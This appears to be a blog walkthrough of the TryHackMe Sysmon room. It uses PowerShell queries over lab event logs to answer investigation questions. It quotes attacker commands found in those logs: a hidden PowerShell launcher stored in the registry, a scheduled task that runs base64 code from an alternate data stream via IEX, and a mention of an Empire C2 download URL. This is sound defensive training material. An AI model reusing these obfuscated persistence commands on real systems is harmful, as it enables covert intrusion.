TL;DR Walkthrough of the TryHackMe Sysmon room, part of the Cyber Defense pathway.
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
There are other good walkthroughs of the Sysmon room out there, this was a good one for example.
However they used Event Viewer instead of PowerShell. In a small evtx file such as TryHackMe provided for this one can get away with that approach. However given live logs in even a small home lab environment that tactic quickly becomes unworkable. That is why we used PowerShell to set the SACLs to define what gets logged, trigger the event, and then query the logs to pull meaningful data here.
We will start by running through the questions, our query to find the relevant data, and the answers.
It is quite helpful to keep a quick & dirty cheatsheet of Sysmon Event Ids handy while creating these queries. TryHackMe didn’t include one in the room and didn’t list all Event Ids, so I’ll put ours here.
Sysmon Event Id cheatsheet
+----+----------------------------------------+
| # | Sysmon Event |
+----+----------------------------------------+
| 1 | Process creation |
| 3 | Network connection |
| 5 | Process terminated |
| 7 | Image loaded |
| 8 | CreateRemoteThread |
| 9 | RawAccessRead |
| 10 | ProcessAccess |
| 11 | FileCreate |
| 12 | RegistryEvent (Object create & delete) |
| 13 | RegistryEvent (Value Set) |
| 14 | RegistryEvent (Key & Value Rename) |
| 15 | FileCreateStreamHash |
| 22 | DNSEvent (DNS query) |
+----+----------------------------------------+
Important Admin Note
I downloaded the task files from TryHackMe and found the answers using them. The Message Property in the Events from the task files were all blank.
If you query the evtx files on THM’s VM in the C:\Users\THM-Analyst\Desktop\Scenarios\Investigations folder then the Event Ids have data in their Message Property.
Hence I used the Properties below. I spot checked a couple of these and they work fine on THM’s VM’s files as well. You might just prefer to use the Message if you complete this room on THM’s VM.
Task 4 Cutting out the Noise
How many event ID 3 events are in C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx?
$Network_Events = Get-WinEvent -Path “C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx” | Where-Object {$_.Id -eq “3”}
$Network_Events.Count
73,591
What is the UTC time created of the first network event in C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx?
$LastOne = $Network_Events | Select-Object -Last 1
$LastOne.Properties[1].Value
2021–01–06 01:35:50.464
THM wants the UtcTime, not the TimeCreated.
Task 10 Practical Investigations
— — Investigation 1 — -
What is the full registry key of the USB device calling svchost.exe in Investigation 1?
We are looking for Event Id 12, 13, or 14 that reference svchost.exe
$Registry_Event = Get-WinEvent -Path .\Investigation-1.evtx | Where-Object {(($_.Id -eq "12") -or ($_.Id -eq "13") -or ($_.Id -eq "14")) -and ($_.Properties[4].Value -like "*svchost.exe*")} | Select-Object *
$Registry_Event.Properties[5]
HKLM\System\CurrentControlSet\Enum\WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_SANDISK&PROD_U3_CRUZER_MICRO&REV_8.01#4054910EF19005B3&0#\FriendlyName
What is the device name when being called by RawAccessRead in Investigation 1?
We are looking for an Event Id 9 that references svchost.exe
$Read_Event = Get-WinEvent -Path .\Investigation-1.evtx | Where-Object {($_.Id -eq "9") -and ($_.Properties.Value -like "*svchost.exe*")} | Select-Object *
($Read_Event | Select-Object -First 1).Properties[4].Value
\Device\HarddiskVolume3
What is the first exe the process executes in Investigation 1?
We are looking for the first Event Id 1 that happened after the Event Id 9 from the last question.
$Time = ($Read_Event | Select-Object -First 1).TimeCreated
(Get-WinEvent -Path .\Investigation-1.evtx | Where-Object {($_.Id -eq "1") -and ($_.TimeCreated -ge $Time)} | Select-Object -Last 1).Properties[8].Value
rundll32.exe
— — Investigation 2 — -
What is the full path of the payload in Investigation 2?
We took an educated guess that the payload was an hta file as THM used them for reverse shells previously.
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {($_.Id -eq “1”) -and ($_.Properties.Value -like “*hta*”)}).Properties.Value
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {($_.Id -eq "1") -and ($_.Properties.Value -like "*hta*")}).Properties.Value[9]
C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta
What is the full path of the file the payload masked itself as in Investigation 2?
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {($_.Id -eq "1") -and ($_.Properties.Value -like "*hta*")}).Properties[20].Value
C:\Users\IEUser\Downloads\update.html
What signed binary executed the payload in Investigation 2?
We already found this in the first question’s query; it’s the legitimate executable than ran opened the *.hta file.
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {($_.Id -eq "1") -and ($_.Properties.Value -like "*hta*")}).Properties[4].Value
C:\Windows\System32\mshta.exe
What is the IP of the adversary in Investigation 2?
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {$_.Id -eq "3"}).Properties[14].Value
10.0.2.18
What back connect port is used in Investigation 2?
To pull just the IP use [16]
(Get-WinEvent -Path .\Investigation-2.evtx | Where-Object {$_.Id -eq "3"}).Properties.Value[16]
4443
— — Investigation 3.1 — -
What is the IP of the suspected adversary in Investigation 3.1?
There’s only three Event Id 3 instances in this evtx file, and one can tell at a glance that it’s the attacker & compromised system talking back & forth. We can pull the specific data point of the attacker’s IP via:
(Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "3"} | Select-Object -First 1).Properties.Value[13]
172.30.1.253
What is the hostname of the affected endpoint in Investigation 3.1?
(Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "3"} | Select-Object -First 1).Properties.Value[9]
DESKTOP-O153T4R.localdomain
What is the hostname of the C2 server connecting to the endpoint in Investigation 3.1?
(Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "3"} | Select-Object -First 1).Properties.Value[14]
empirec2
Where in the registry was the payload stored in Investigation 3.1?
There’s only two Event Id 13 entries in the evtx, and one will notice at a glance that the first one runs the second one.
(Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "13"} | Select-Object -Last 1).Properties.Value[5]
HKLM\SOFTWARE\Microsoft\Network\debug
What PowerShell launch code was used to launch the payload in Investigation 3.1?
(Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "13"} | Select-Object -First 1).Properties.Value[6]
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -c “$x=$((gp HKLM:Software\Microsoft\Network debug).debug);start -Win Hidden -A \”-enc $x\” powershell”;exit;
Notice that ‘gp’ is an alias for ‘Get-ItemProperty’, in other words it is pulling a value from HKLM:Software\Microsoft\Network\debug and executing it in a hidden PowerShell window. This is obviously suspicious. We will return to this after the questions are all answered.
— — Investigation 3.2 — -
What is the IP of the adversary in Investigation 3.2?
$Events = Get-WinEvent -Path .\Investigation-3.2.evtx | Where-Object {$_.Id -eq "3"}
$Events[0].Properties
$Events[0].Properties[13].Value
172.168.103.188
What is the full path of the payload location in Investigation 3.2?
(Get-WinEvent -Path .\Investigation-3.2.evtx | Where-Object {($_.Id -eq "1") -and ($_.Properties.Value -like "*schtasks.exe*")}).Properties.Value[8]
“C:\WINDOWS\system32\schtasks.exe” /Create /F /SC DAILY /ST 09:00 /TN Updater /TR “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \”IEX ([Text.Encoding]::UNICODE.Get
String([Convert]::FromBase64String($(cmd /c ‘’more < c:\users\q\AppData:blah.txt’’’))))\””
We’re looking for just the path to the payload itself, so just copy/paste the text file path that cmd.exe is reading and then passing the contents of to PowerShell to execute. On a side note, it’s a nifty obfuscation technique
c:\users\q\AppData:blah.txt
What was the full command used to create the scheduled task in Investigation 3.2?
We just copy/pasted the path from it above, so the answer to this one is simply the full scheduled task.
“C:\WINDOWS\system32\schtasks.exe” /Create /F /SC DAILY /ST 09:00 /TN Updater /TR “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \”IEX ([Text.Encoding]::UNICODE.Get
String([Convert]::FromBase64String($(cmd /c ‘’more < c:\users\q\AppData:blah.txt’’’))))\””
What process was accessed by schtasks.exe that would be considered suspicious behavior in Investigation 3.2?
We are looking for Event Id 10 ProcessAccess and schtasks.
(Get-WinEvent -Path .\Investigation-3.2.evtx | Where-Object {($_.Id -eq "10") -and ($_.Properties.Value -like "*schtasks.exe*")}).Properties.Value[4]
C:\WINDOWS\system32\lsass.exe
TryHackMe only wants the process, not the full path so:
lsass.exe
— — Investigation 4 — -
What is the IP of the adversary in Investigation 4?
$Network_Events = Get-WinEvent -Path .\Investigation-4.evtx | Where-Object {$_.Id -eq "3"}
$Network_Events[3].Properties
$Network_Events[3].Properties[13].Value
172.30.1.253
What port is the adversary operating on in Investigation 4?
$Network_Events[3].Properties[10].Value
80
What C2 is the adversary utilizing in Investigation 4?
$Network_Events[2].Properties[16].Value
empire
Base64 PowerShell commands
Remember the last question in Investigation 3.1? The command pulls a value from the registry and executes it in PowerShell?
TryHackMe didn’t ask about the command itself but I was curious.
$Registry_Events = Get-WinEvent -Path .\Investigation-3.1.evtx | Where-Object {$_.Id -eq "13"}
$Base64 = $Registry_Events[1].Properties.Value[6]
$DecodedCommand = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("$Base64"))
$DecodedCommand
IEX is an alias for Invoke-Expression, which runs a string as a command. If you Google “Invoke-Expression” the first thing that comes up is about using it to obfuscate PowerShell execution flow.
I broke the one liner up into the if else statements, multiple commands, etc and made some sense of it. It appears to create a connection to http://empire2:80/admin/get.php using a hard coded cookie value, download something, and then pass it to Invoke-Expression.
Microsoft Defender wasn’t fooled by the way.
Summary
Together with the Windows Event Logs room this was really good practice at analyzing logs and parsing data in general.
If this walkthrough helps anyone else then that’s a bonus, but I mostly took these notes so I could refer back to them rather than memorizing how to query Sysmon logs.
We covered the attacker TTP of using Base64 encoded commands briefly before here. I’m not sure why running Base64 commands is even a feature in Windows, but then I don’t know why automatically downloading Office templates from the Internet was either. Needless to say your SIEM should be screening for Base64 and obfuscated commands in general.
References
Good Sysmon writeup, uses Event Viewer instead of PowerShell: https://medium.com/@laupeiip/tryhackme-sysmon-write-up-50a7043c86cf
CredentailCache.DefaultNetwork Credentials Property: https://learn.microsoft.com/en-us/dotnet/api/system.net.credentialcache.defaultnetworkcredentials?view=net-7.0
Sysmon Event Id list: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
Get-ItemProperty: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-itemproperty?view=powershell-7.3
Attacker TTPs RE obfuscating Invoke-Expression: https://www.securonix.com/blog/hiding-the-powershell-execution-flow/#:~:text=%E2%80%9CInvoke%20expressions%E2%80%9D%20(IEX),both%20local%20and%20remote%20payloads.
Invoke-Expression: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.3
Macro injection from a remote template: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros
ASCII Table Creator: https://ozh.github.io/ascii-tables/